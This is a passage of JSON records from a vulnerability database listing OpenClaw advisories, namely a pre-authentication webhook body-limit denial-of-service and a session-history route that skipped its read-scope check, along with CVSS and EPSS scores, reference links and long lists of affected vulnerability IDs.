Consumption\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27) | Permissive body limit constants: `FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024` (1MB) and `FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000` (30s) — should be 64KB/5s to match the CVE-2026-32011 patch. |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280) | `installRequestBodyLimitGuard` call in `monitorWebhook()` using the permissive constants — this guard runs before authentication (the Lark SDK handler at line 284). |","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35665","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29524","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29454","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29487","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35665"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35665","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35665"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing"},{"reference_url":"https://github.com/advisories/GHSA-w6m8-cqvj-pg5v","reference_id":"GHSA-w6m8-cqvj-pg5v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w6m8-cqvj-pg5v"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg","reference_id":"GHSA-x4vp-4235-65hg","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35665","GHSA-w6m8-cqvj-pg5v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9pj9-7b12-jbea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91302?format=json","vulnerability_id":"VCID-9uyu-y9qv-u7e1","summary":"OpenClaw: Gateway HTTP Session History Route Bypasses Operator Read Scope\n## Summary\n\nGateway HTTP Session History Route Bypasses Operator Read Scope\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nThe HTTP `/sessions/:sessionKey/history` route previously authenticated bearer tokens but skipped the same `operator.read` check used by `chat.history` over WebSocket. Commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` makes HTTP callers declare operator scopes and rejects history reads that do not include `operator.read`.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`.\n\n## Fix Commit(s)\n\n- `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35657","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08981","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08979","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08998","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35657"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35657","reference_id":"CVE-2026-35657","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35657"},{"reference_url":"https://github.com/advisories/GHSA-5jvj-hxmh-6h6j","reference_id":"GHSA-5jvj-hxmh-6h6j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5jvj-hxmh-6h6j"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route","reference_id":"openclaw-authorization-bypass-in-http-session-history-route","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113407?format=json","purl":"pkg:npm/openclaw@2026.3.25","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.25"},{"url":"http://public2.vulnerablecode.io/api/packages/998171?format=json","purl":"pkg:npm/openclaw@2026.3.28-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{